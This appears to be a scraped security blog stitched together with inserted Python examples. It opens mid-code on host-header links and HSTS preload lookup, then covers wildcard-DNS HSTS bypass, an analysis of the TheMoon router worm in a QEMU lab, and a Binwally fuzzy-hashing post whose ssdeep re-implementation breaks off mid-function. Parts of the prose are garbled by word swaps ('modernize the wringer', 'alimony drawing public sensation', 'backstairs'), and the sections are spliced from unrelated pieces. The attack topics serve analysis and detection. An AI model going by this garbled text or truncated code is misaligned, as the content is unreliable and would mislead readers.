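    if host != trusted_suffix and not host.endswith("." + trusted_suffix):
        return None
    return f"https://{host}{path}"


def link_from_canonical_host(canonical_host: str, path: str) -> str:
    """The fix the post describes: the link is hard-coded to the canonical host, never derived from the request."""
    return f"https://{canonical_host}{path}"


# Constructed stand-in for Chrome's preload list; only the shape of the data matters here.
PRELOAD: Dict[str, Dict[str, object]] = {
    "google.com": {"include_subdomains": True, "pins": "google"},
}


def hsts_entry_for(host: str, preload: Dict[str, Dict[str, object]] = PRELOAD,
                   strict_syntax: bool = True) -> Optional[Dict[str, object]]:
    """Walk from the host up through its parent domains and return the first applicable entry.
    strict_syntax=True mimics the pre-fix behaviour described in the post: a non-RFC name is
    rejected up front, so no HSTS/pinning policy applies to it even though the rest of the
    stack happily resolves and fetches it. strict_syntax=False applies the policy to any name."""
    host = host.lower().rstrip(".")
    if strict_syntax and not is_rfc1123_hostname(host):
        return None
    labels = host.split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        entry = preload.get(candidate)
        if entry is not None and (i == 0 or entry["include_subdomains"]):
            return entry
    return None


if __name__ == "__main__":
    for h in ("-www.plus.google.com", "www-.plus.google.com", "www.-.plus.google.com",
              "www.example.com-----www.drive.google.com"):
        print(f"{h}: rfc1123={is_rfc1123_hostname(h)}")
    print(link_from_request_host("www.example.com.-.zero.facebook.com", "facebook.com", "/confirm"))
    print(link_from_request_host("www.example.com-----www.drive.google.com", "google.com", "/export-result"))
    print(link_from_canonical_host("drive.google.com", "/export-result"))
    print(hsts_entry_for("www-.sites.google.com"), hsts_entry_for("www-.sites.google.com", strict_syntax=False))
```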
If you're in Turkey right now you don't need to do anything, <a href="http://googleonlinesecurity.blogspot.com.br/2014/03/googles-public-dns-intercepted-in-turkey.html">Turkish Telecom does all the MITM work for you</a>.<br /><br />It's worth mentioning that when you issue a wildcard certificate for your host, it will be valid for a single level only. Certificates issued to *.google.com should not be trusted when used on domains like abc.def.google.com.<br /><br />The hardcoded list of domains and pinned certificates from Chrome can be found here:<br /><br />- <a href="https://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json">https://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json</a><br /><br />During my analysis, I found that 55 out of 397 domains with Transport Security enabled had wildcard entries in their DNS. A nation-sponsored attacker with a <a href="https://twitter.com/lucabruno/status/450239917000781825">valid and trusted CA</a> could simply MITM your traffic and inject requests to these invalid domains, circumventing the HSTS policies and stealing session cookies, for example.<br /><br />Google did not assign a CVE to that bug, but they fixed it within a couple of weeks. Chrome 32 and 33+ (the one that reverted the SSL warning from red to yellow) are not affected by this issue.<br /><br />In times of <a href="https://www.imperialviolet.org/2014/02/22/applebug.html">Goto fail</a>, it was really interesting to follow the Chromium tracker, their internal discussions, the tests performed and so on. The commits fixing these issues can be found <a href="https://codereview.chromium.org/54623005/">here</a>.<br /><br /><b>Conclusion</b><br /><br />The Google and Facebook security teams were both great to deal with. The bug was quite fun as well, since it was different from the traditional OWASP Top 10 issues.<br /><br />And since the industry totally <a href="http://blog.secureideas.com/2013/09/industry-issues-new-vulnerabilities-and.html">needs new vulnerability terminologies</a>, anyone willing to refer to these attacks shall name them Advanced Persistent Cross Site Wildcard Domain Header Poisoning (or simply APCSWDHP).<br /><br />In case you're from the NSA and want to use this technique to backdoor our DNS servers, please use the codename CRAZY KOALA so we can better track it when the next Snowden leaks your documents.<br /><br />Bernardo Rodrigues (<a href="http://www.blogger.com/profile/09470949514402700579">Blogger profile</a>)<br /><br /><b>Analyzing Malware for Embedded Devices: TheMoon Worm</b><br />Published 2014-02-17, updated 2014-02-18, by Bernardo Rodrigues<br /><br /><div>All the media outlets are reporting that Embedded Malware is becoming mainstream. 
This is something <a href="http://dronebl.org/blog/8">totally new</a> and we <a href="http://internetcensus2012.bitbucket.org/paper.html">never heard of this before</a>, right? The high number of Linux SOHO routers with Internet-facing administrative interfaces, the lack of firmware updates and the ease of crafting exploits make them a perfect target for online criminals. The <a href="http://blog.ioactive.com/2014/02/internet-of-threats.html">Internet of Threats is wildly insecure</a>, but definitely not unpatchable.</div><br /><div>To all infosec people out there, it's important to understand these threats and report them properly to the media. Some top-notch researchers recently uncovered "Massive Botnets" infecting refrigerators, microwaves, gaming consoles, soda machines and tamagotchis. The problem is that they never provided any sort of evidence, no malware samples, no IOCs, and did not write a <a href="http://attrition.org/errata/charlatan/hakin9/hakin9-nmap-ebook-ch1.pdf">Hakin9 article</a> describing it.</div><br />(Image caption: Refrigerator Botnet? Revd. Pastor Laphroaig says <a href="https://archive.org/details/Pocorgtfo02">Show the PoC || GTFO</a>)<br /><br /><div>The aim of this post is to provide more information on identifying and executing embedded binaries, describing how to set up your own virtual lab. In case you missed it, head to the first post of the "<a href="http://w00tsec.blogspot.com.br/2013/09/analyzing-and-running-binaries-from.html">Analyzing and Running binaries from Firmware Images</a>" series.</div><br /><b>TheMoon Worm</b><br /><br /><div><a href="https://twitter.com/johullrich">Johannes</a> from SANS provided me with a sample of the "TheMoon" malware and posted some interesting information on their <a href="https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Captured/17630">handler's diary</a>. Their honeypots captured the scanning activity and <a href="https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633">linked the exploit</a> to a vulnerable CGI script running on specific firmwares of the following Linksys routers: E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900.<br /><br />SANS handlers classified TheMoon as a worm because of the self-replicating nature of the malware. The worm requests an "HNAP1" URL to fingerprint and identify potentially vulnerable routers. If you check your firewall and server logs you may find lots of different IPs probing this URL.<br /><br />The worm was named like this because it contains images from the movie "The Moon". It's possible to carve a few PNGs out of the ELF binary.</div><br /><b>Identifying the Binary</b><br /><br /><div>A total of seven different samples were provided: they all seem to be variants of the same malware, judging by the ssdeep matching score.<br /><br />Let's start by running the file utility and readelf to identify the architecture (MIPS R3000 / Little Endian).<br /><br />The EXr.pdf variant (MD5 88a5c5f9c5de5ba612ec96682d61c7bb) had a <a href="https://www.virustotal.com/en/file/1ef6b45a2e5e6b547df2f5672bf48ebfd2720ffa8eed308010fb90f6fd8d79b6/analysis/1392517591/">VirusTotal detection rate of 3 / 50</a> on 2014-02-16.</div><br /><b>QEMU</b><br /><br /><div>We'll be using QEMU to run the binaries in a controlled environment. I usually use two different setups to run MIPS Linux binaries, both based on the <a href="https://dev.openwrt.org/wiki/malta">Malta</a> platform.<br /><br /><b>OpenWRT MIPS</b><br /><br />The OpenWRT Malta CoreLV platform is intended to be used with QEMU (in big or little endian mode). The install procedure is pretty straightforward using <a href="http://wiki.openwrt.org/doc/howto/buildroot.exigence">OpenWRT Buildroot</a>. OpenWrt Buildroot is the build system for the distribution and it works on Linux, BSD or Mac OS X. In case you don't remember, the authors of the <a href="http://internetcensus2012.bitbucket.org/paper.html">Carna Botnet</a> used it to cross-compile their binaries.<br /><br />Installing prerequisites (on your favorite <a href="http://anonscm.debian.org/gitweb/?p=collab-maint/debmirror.git;a=commitdiff;h=fcd972395b0201fcde4915d282982926f0d04c56;hp=7fcdf0d225c480b386c5a1f487e68dc39b57e771">Debian derivative</a>):<br /><br /><script src="https://gist.github.com/bmaia/9042465.js"></script>Now head to the openwrt folder and set the proper settings for your Linux kernel, choosing "MIPS Malta CoreLV board (qemu)" for the Target System and "Little Endian" for the subtarget. Don't forget to save the config.<br /><br /><script src="https://gist.github.com/bmaia/9042489.js"></script><br />Now <a href="http://wiki.openwrt.org/doc/howto/build">build your image</a> (use the -j switch to speed it up if you have multiple cores, e.g. "-j 3"):<br /><br /><script src="https://gist.github.com/bmaia/9042500.js"></script><br />Your image will be ready within a couple of minutes. Now you need to install the QEMU full system emulation binaries and start it with the right command-line switches:<br /><br /><script src="https://gist.github.com/bmaia/9042808.js"></script><br />To exit the console simply hit CTRL+A followed by C and Q.<br /><br />If you want to connect your emulated machine to a real network, follow the steps from <a href="http://www.aurel32.net/info/debian_mips_qemu.php">Aurelien's Blog</a> or simply run the following commands to get Internet access:<br /><br /><script src="https://gist.github.com/bmaia/9042823.js"></script>If you don't want to compile the kernel yourself, you can grab the pre-compiled binaries from <a href="http://downloads.openwrt.org/attitude_adjustment/12.09-rc1/malta/generic/">here</a> or <a href="http://www.cpe.ku.ac.th/~aphirak/malta/">here</a> (at your own risk).<br /><br />You may remember that it was not possible to run <a href="http://w00tsec.blogspot.com.br/2013/09/analyzing-and-running-binaries-from.html">busybox-simet</a> using the standalone qemu-mips-static. It's possible to fix that by manually patching QEMU, or you can run it inside the proper virtual machine (OpenWRT Malta MIPS/Big Endian).</div><br /><b>Debian MIPS Linux</b><br /><br /><div>I won't describe how to set up your Debian MIPS Linux because <a href="https://twitter.com/zcutlip">Zach Cutlip</a> already did an amazing job describing it in <a href="http://shadow-file.blogspot.com.br/2013/05/running-debian-mips-linux-in-qemu.html">this blog post</a>. The process is quite similar to the OpenWRT one and, if you're too lazy to build your own environment, <a href="http://www.aurel32.net/">Aurelien</a> provides pre-compiled binaries <a href="http://people.debian.org/~aurel32/qemu/mipsel/">here</a>. Don't forget to set up your network connections properly.<br /><br /><b>Dynamic Analysis</b><br /><br />In order to emulate the Linksys environment, let's download and unpack the firmware of the E2500v2 (v1.0.07).<br /><br /><script src="https://gist.github.com/bmaia/9042835.js"></script>Let's copy and extract the root filesystem (e2500.tar.gz) and the malicious binary (EXr.pdf) to our test machine (Debian MIPS). Remember to copy the worm to the appropriate "/tmp" folder. Back up your QEMU image, start sniffing the connections from the bridged network (tap1 in my case) and bind the necessary pseudo-devices into the chrooted path. You can run the binary directly on your Debian MIPS environment, but using chroot and the target filesystem is highly recommended. 
If you try to chroot and run the worm without binding these devices, it will refuse to run and it won't drop the second-stage binary.<br /><br /><script src="https://gist.github.com/bmaia/9042842.js"></script>You can use strace to log the syscalls and start your chrooted shell to run the malicious binary. I had some issues using strace on the 2.6.32 Debian MIPS kernel (vmlinux-2.6.32-5-4kc-malta). The 3.2.0 (vmlinux-3.2.0-4-4kc-malta) version seems to be running fine.<br /><br /></div><div><script src="https://gist.github.com/bmaia/9042862.js"></script><br />If you don't want to use strace, simply start sh chrooted and run the malware.<br /><br />The worm tries to remove files with certain extensions and performs a series of system checks. After a few seconds the binary is removed from /tmp/ and three files are written to disk: .L26 (PID), .L26.lunar (Lunar Base URL) and .L26.out (debug log).<br /><br /><script src="https://gist.github.com/bmaia/9042570.js"></script>It's possible to dump QEMU's physical memory using the <a href="http://doc.opensuse.org/products/draft/SLES/SLES-kvm_sd_draft/cha.qemu.monitor.html">pmemsave</a> command by hitting CTRL+A, C (to enter QEMU's administrative monitor interface) and entering:<br /><br /><script src="https://gist.github.com/bmaia/9042866.js"></script><br />The 256MB raw dump will be saved to your host's local path. You can now try to use Volatility or run strings against it.<br /><br />The worm starts scanning for ports 80 and 8080 on a <a href="https://isc.sans.edu/diaryimages/moonnets">hardcoded list of networks</a>. 
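The reconnaissance described above shows up in any web server's access log as requests for /HNAP1/. This added example, not code from the post or the SANS diary, parses constructed combined-format log lines and flags sources that fetched /HNAP1/ and then POSTed to a CGI path; the addresses are documentation ranges and /example.cgi is a placeholder, not the name of the script the worm targets.

```python
import re
from collections import Counter
from typing import Dict, List

# nginx/Apache "combined" log format (regex written for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines: documentation IP ranges, and /example.cgi stands in for
# whatever CGI endpoint your own device exposes. The last line is deliberately malformed.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Feb/2014:03:12:01 -0300] "GET /HNAP1/ HTTP/1.1" 404 162 "-" "-"
203.0.113.5 - - [16/Feb/2014:03:12:02 -0300] "POST /example.cgi HTTP/1.1" 404 162 "-" "-"
198.51.100.7 - - [16/Feb/2014:03:15:44 -0300] "GET /HNAP1/ HTTP/1.1" 404 162 "-" "-"
192.0.2.10 - - [16/Feb/2014:03:16:10 -0300] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [16/Feb/2014:03:16:12 -0300] "POST /example.cgi HTTP/1.1" 200 88 "-" "Mozilla/5.0"
this line is not a log entry
"""


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse combined-format lines into dicts; lines that do not match are skipped, not fatal."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def _is_hnap1(path: str) -> bool:
    # Match /HNAP1 and /HNAP1/ regardless of case; ignore any query string.
    return path.split("?")[0].rstrip("/").lower().endswith("/hnap1")


def hnap1_probes(entries: List[Dict[str, str]]) -> Counter:
    """Count /HNAP1/ fingerprint requests per source IP: the worm's reconnaissance step."""
    return Counter(e["ip"] for e in entries if _is_hnap1(e["path"]))


def probe_then_post(entries: List[Dict[str, str]]) -> List[str]:
    """Source IPs that fetched /HNAP1/ and later POSTed to a .cgi path: the fingerprint-then-
    exploit sequence, a stronger signal than a lone probe. File order is taken as time order."""
    probed = set()
    flagged: List[str] = []
    for e in entries:
        path = e["path"].split("?")[0].lower()
        if _is_hnap1(path):
            probed.add(e["ip"])
        elif e["method"] == "POST" and path.endswith(".cgi") and e["ip"] in probed:
            if e["ip"] not in flagged:
                flagged.append(e["ip"])
    return flagged


if __name__ == "__main__":
    parsed = parse_log(SAMPLE_LOG)
    print("HNAP1 probes per IP:", dict(hnap1_probes(parsed)))
    print("probe followed by CGI POST:", probe_then_post(parsed))
```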
If the /HNAP/ URL returns a string identifying the targeted routers, the malware sends an HTTP POST trying to <a href="http://www.exploit-db.com/exploits/31683/">exploit a command injection</a> in the vulnerable CGI.<br /><br />Decoded POST:<br /><br /><script src="https://gist.github.com/bmaia/9042580.js"></script><br />TheMoon will also start an HTTPS server ("Lunar Base") on the router using the random port recorded in the .L26.lunar file. The certificate's Common Name, Organization and Organizational Unit are hardcoded and the other values seem to be random. Trying to find these entries in the <a href="https://scans.io/">scans.io</a> SSL certificate datasets would be really interesting.<br /><br />The HTTPS server hosts three files: gerty.png, lunar.png and favicon.ico.<br /><br />Rkhunter reports a few warnings on the infected system. I have uploaded the complete output from rkhunter to Pastebin, get it <a href="http://pastebin.com/CSkh2jJ5">here</a>.<br /><br />Another useful technique is to compare the contents of the filesystem with a known good template. You can use <a href="http://w00tsec.blogspot.com.br/2013/12/binwally-directory-tree-diff-tool-using.html">binwally</a>, <a href="http://winmerge.org/">WinMerge</a> or <a href="https://github.com/devttys0/binwalk/blob/master/src/binwalk/modules/hashmatch.py">binwalk's hashmatch</a>.<br /><br /><script src="https://gist.github.com/bmaia/9042869.js"></script><br /><b>Conclusion</b><br /><div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;"><div style="margin: 0px;"><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; 
line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"></div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;"></div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"></div><div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;"><div style="orphans: auto; text-align: start; text-indent: 0px; widows: auto;"><div style="margin: 0px;"><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">I did not spend much time reversing the files and its functions as the main purpose of this post was to provide information to identify and execute embedded binaries, describing how to set your own virtual lab using QEMU.</div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; 
white-space: normal; word-spacing: 0px;">It's still possible to modernize the wringer by <a href="https://github.com/zcutlip/nvram-faker">faking the nvram</a>, by <a href="http://wiki.qemu.org/Documentation/Debugging">running a GDB server with QEMU</a>&nbsp;or using <a href="https://code.google.com/p/volatility/issues/detail?id=436">Volatility with the proper profile and debugging structures</a>, but this post is once way too long. You should moreover have a squint on <a href="http://www.s3.eurecom.fr/tools/avatar/">Avatar</a>, from <a href="http://www.eurecom.fr/rs/system_security_group">EURECOM</a>.&nbsp;Avatar's goal is to enable ramified dynamic wringer of embedded firmware in order to squire in a wide range of security-related activities, including malware analysis, reverse engineering and vulnerability discovery.</div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></div><div style="margin: 0px;"><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;">Let's alimony drawing public sensation on the security issues of the Internet of Threats, persuading manufactures, ISP's and final users to interreact to write these problems.</div><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></div><br /><div style="-webkit-text-stroke-width: 0px; color: black; font-family: 
'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-transform: none; white-space: normal; word-spacing: 0px;"><br /></div></div></div></div></div></div></div></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com11tag:blogger.com,1999:blog-3296471108082693838.post-78173567823852060732013-12-03T10:53:00.000-02:002013-12-10T17:36:29.083-02:00Binwally: Directory tree unequal tool using Fuzzy HashingFor this post, I'll discuss well-nigh the concept of directory tree and binary diffing and how it could be used to find potential vulnerabilities and security issues that were (silently) patched on firmware images.<br /><br />Silent patching is a big deal as we don't have many security researchers like&nbsp;<a href="http://www.h2hc.org.br/h2hc/en/palestrantes#Speaker1">Spender</a>&nbsp;around. This is a worldwide practice among companies that create software and firmwares for embedded devices. Changelogs from new firmwares often contains few information well-nigh security issues, outlining the changes as "bugfixes" or "enhancements": we get no CVE's and we don't know how hair-trigger the flaws are.<br /><br />In wing to that, you may occasionally find some reference for the string <a href="http://www.aldeid.com/wiki/Exploits/proftpd-1.3.3c-backdoor">'Ac1db1tch3z' on your code</a>&nbsp;(which ways that you got a self-ruling vulnerability assessment) or your employee&nbsp;<a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">Joel might forget to remove a backstairs from the firmware</a>. 
Diffing the content of previous firmware versions may be useful to find out when these backdoors were first installed, modified and/or removed.<br /><br />
I introduce you to Binwally: a simple script to perform directory tree diffing using the concept of Fuzzy Hashing (<a href="http://ssdeep.sourceforge.net/">ssdeep</a>) to compute a matching score between binaries.<br /><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-Ri52aNEsE5w/Upv4DEVTCkI/AAAAAAAAAJ0/U2AZWVEJljA/s1600/binwally.png"><img height="230" src="http://2.bp.blogspot.com/-Ri52aNEsE5w/Upv4DEVTCkI/AAAAAAAAAJ0/U2AZWVEJljA/s320/binwally.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Binwally says "no" to Silent Patching</td></tr></tbody></table><br />
<b>Fuzzy Hashing</b><br /><br />
Fuzzy Hashing, also known as context triggered piecewise hashing (CTPH), can match inputs that have homologies. Such inputs have sequences of identical bytes in the same order, although the bytes in between these sequences may differ in both content and length. The concept was introduced by <a href="https://github.com/tridge">Andrew Tridgell</a> and the most well-known tool is <a href="http://ssdeep.sourceforge.net/">ssdeep</a>, created by <a href="https://twitter.com/jessekornblum">Jesse Kornblum</a>.<br /><br />
The usage example on <a href="http://ssdeep.sourceforge.net/usage.html">ssdeep's homepage</a> summarizes it well:<br />
<div class="code">$ ls -l foo.txt<br />-rw-r--r-- &nbsp; 1 jessekor &nbsp;jessekor &nbsp;240 Oct 25 08:01 foo.txt</div><div class="code">$ cp foo.txt bar.txt<br />$ echo 1 &gt;&gt; bar.txt</div><br />
A cryptographic hashing algorithm like MD5 can't be used to match these files; they have wildly different hashes.<br />
<div class="code">$ md5deep foo.txt bar.txt<br />7b3e9e08ecc391f2da684dd784c5af7c &nbsp;/Users/jessekornblum/foo.txt<br />32436c952f0f4c53bea1dc955a081de4 &nbsp;/Users/jessekornblum/bar.txt</div><br />
But fuzzy hashing can! We compute the fuzzy hash of one file and use the matching mode to match the other one.<br />
<div class="code">$ ssdeep -b foo.txt &gt; hashes.txt<br />$ ssdeep -bm hashes.txt bar.txt<br />bar.txt matches foo.txt (64)</div><br />
The number at the end of the line is a match score, a weighted measure of how similar these files are. The higher the number, the more similar the files.<br /><br />
<b>Binwally</b><br /><br />
Binwally is a simple Python script that uses this concept to diff directory trees in order to find different, unique and matching files, displaying an overall score of the results. It was based on diffall.py from the book <a href="http://www.amazon.com/Programming-Python-Mark-Lutz/dp/0596158106/">Programming Python (4th Edition)</a> and it requires <a href="https://github.com/DinoTools/python-ssdeep">python-ssdeep</a>, a wrapper for <a href="http://ssdeep.sourceforge.net/">ssdeep</a> (which is written in C). You can download the script from my Github, following the link below:<br /><br />
<ul><li><a href="https://github.com/bmaia/binwally">Download Binwally</a></li></ul><br />
The code is pretty straightforward: it takes two dirs/files as arguments and displays which files are unique, which ones match and which ones differ, together with their match score. It still needs some improvement (the overall matching score is based on the number of files and doesn't consider the file sizes, for example) but it works fine for what it is meant to accomplish.<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--QD8iIwA-C4/UpzvIGUF7JI/AAAAAAAAAKQ/Hyjv1lMolYs/s1600/bin1.png"><img height="170" src="http://1.bp.blogspot.com/--QD8iIwA-C4/UpzvIGUF7JI/AAAAAAAAAKQ/Hyjv1lMolYs/s400/bin1.png" width="400" /></a></div><br />
Comparing two directory trees from a firmware unsquashed using Binwalk and firmware-mod-kit:<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-zhz-masG9Ic/UpzvIDKP58I/AAAAAAAAAKU/ApZfSNX8MXU/s1600/bin2.png"><img height="380" src="http://3.bp.blogspot.com/-zhz-masG9Ic/UpzvIDKP58I/AAAAAAAAAKU/ApZfSNX8MXU/s640/bin2.png" width="640" /></a></div><br />
You can already do this using <a href="http://winmerge.org/">WinMerge</a>, but that tool does not display a matching score, it's not command-line based and it's not scriptable. You can check my <a href="http://w00tsec.blogspot.com/2013/08/simet-box-firmware-analysis-embedded.html">previous post</a> describing how to use it to diff firmware images.<br /><br />
Binwally is best used together with <a href="https://github.com/devttys0/binwalk/">Binwalk</a>, which is why I'll talk to <a href="https://twitter.com/devttys0">devttys0</a> about merging it into his tool (maybe as a new command line switch under the Binary Diffing options). Binwalk already supports binary diffing (the -H switch), but it only compares the files and firmware images themselves. The problem is that firmware images are usually packed, encrypted and/or compressed. When you unpack them and compare the extracted files and their directory tree, you get much more valuable information. If you disassemble the code and compare the results again, you get even better data: this is what <a href="http://www.zynamics.com/bindiff.html">bindiff</a> from Zynamics/Google does pretty well. The Insinuator blog has a nice <a href="http://www.insinuator.net/2013/07/reverse-engineering-tools/">example of how to use bindiff for RE</a>.<br /><br />
<b>Binwally Usage: Dissecting the DLink Backdoor Patch</b><br /><br />
So you may have heard recently that some DLink routers <a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">had a backdoor</a> and that a <a href="http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10001">security update</a> was issued to address the vulnerability.<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-5BHqkjoe934/Upzq0ZWvojI/AAAAAAAAAKE/tAbARywAHL4/s1600/dlink1.png"><img height="320" src="http://4.bp.blogspot.com/-5BHqkjoe934/Upzq0ZWvojI/AAAAAAAAAKE/tAbARywAHL4/s320/dlink1.png" width="319" /></a></div>
According to <a href="https://www.schneier.com/">Bruce Schneier</a>, we should "Trust but verify": that's what we are going to do here. First let's download the <a href="ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_reva_113_ALL_en_20110915.zip">backdoored version (v1.13)</a> and the <a href="ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_revA1_114wwb02_all_en_20131112.zip">patched version (1.14)</a> from DLink's FTP. The next step is to extract the firmware images (binwalk -e DIR100A1_FW114WWB02.bix DIR100_v5.0.0EUb3_patch02.bix) and compare the directory trees using Binwally:<br /><br />
<div class="code">$ python binwally.py _DIR100_v5.0.0EUb3_patch02.bix.extracted/ _DIR100A1_FW114WWB02.bix.extracted/ </div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-PP2Ye6FTpcM/Upz2N0uAP2I/AAAAAAAAAKk/y1ly5feX3qk/s1600/bin3.png"><img height="640" src="http://1.bp.blogspot.com/-PP2Ye6FTpcM/Upz2N0uAP2I/AAAAAAAAAKk/y1ly5feX3qk/s640/bin3.png" width="594" /></a></div><br />
I removed the matching files and symlinks for better readability, but the analysis is now narrowed down to a small set of files. According to the release notes, a minor PPPoE dial-up issue was also fixed, which may be the reason why "/bin/pppd" had differences.<br /><br />
Some files, like "/www/Home/bsc_lan.htm", have a matching score of 100 even though they have different content and different MD5 hashes. This is due to the nature of Fuzzy Hashing: the small modification was not enough to change the fuzzy hash value.
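The scoring behaviour just described (a tiny edit still scoring close to 100, while unrelated binaries score 0, and "match" meaning byte-identical content) can be reproduced without python-ssdeep. The following is an added example and is neither Binwally's nor ssdeep's code: a compact Python re-implementation of context triggered piecewise hashing with ssdeep's comparison rules, driving a Binwally-style tree diff that also serves the known-good-template comparison recommended in the TheMoon post above. The two firmware trees are constructed in memory, with deterministic pseudo-random bytes standing in for compiled binaries and a one-byte change standing in for a silent patch; for real extracted firmware, walk the directory with os.walk and read each regular file into the same {path: bytes} shape. ssdeep's squeezing of runs of repeated signature characters is left out, so signatures and scores for highly repetitive files will not match ssdeep's exactly.

```python
# Added example (not Binwally's or ssdeep's code): ssdeep-style context triggered
# piecewise hashing, ssdeep's scoring rules, and a Binwally-style tree diff.
import random

SPAMSUM_LENGTH = 64                 # max signature length, as in ssdeep
MIN_BLOCKSIZE = 3
WINDOW = 7                          # rolling-hash window, as in ssdeep
FNV_INIT, FNV_PRIME = 0x28021967, 0x01000193
B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
MASK32 = 0xFFFFFFFF


class RollingHash:
    """ssdeep's rolling hash: depends only on the last WINDOW bytes, so a trigger
    decision is local and a small edit cannot shift every piece boundary."""
    def __init__(self):
        self.window = [0] * WINDOW
        self.h1 = self.h2 = self.h3 = self.n = 0

    def update(self, c):
        self.h2 = (self.h2 - self.h1 + WINDOW * c) & MASK32
        self.h1 = (self.h1 + c - self.window[self.n % WINDOW]) & MASK32
        self.window[self.n % WINDOW] = c
        self.n += 1
        self.h3 = ((self.h3 << 5) & MASK32) ^ c
        return (self.h1 + self.h2 + self.h3) & MASK32


def fuzzy_hash(data: bytes) -> str:
    """Return 'blocksize:signature:signature_at_double_blocksize' (ssdeep's layout)."""
    bs = MIN_BLOCKSIZE
    while bs * SPAMSUM_LENGTH < len(data):   # block size that yields about 64 pieces
        bs *= 2
    roll, sig1, sig2, rs = RollingHash(), [], [], 0
    h1 = h2 = FNV_INIT
    for c in data:
        rs = roll.update(c)
        h1 = ((h1 * FNV_PRIME) & MASK32) ^ c   # FNV hash of the piece in progress
        h2 = ((h2 * FNV_PRIME) & MASK32) ^ c
        if rs % bs == bs - 1 and len(sig1) < SPAMSUM_LENGTH - 1:        # trigger: close piece
            sig1.append(B64[h1 & 63]); h1 = FNV_INIT
        if rs % (2 * bs) == 2 * bs - 1 and len(sig2) < SPAMSUM_LENGTH // 2 - 1:
            sig2.append(B64[h2 & 63]); h2 = FNV_INIT
    if rs != 0:                                # flush the unterminated last piece
        sig1.append(B64[h1 & 63]); sig2.append(B64[h2 & 63])
    return f"{bs}:{''.join(sig1)}:{''.join(sig2)}"


def _edit_distance(a, b):
    """Levenshtein with insert/delete cost 1 and substitution cost 2 (ssdeep's weights)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (0 if ca == cb else 2)))
        prev = cur
    return prev[-1]


def _score(s1, s2, bs):
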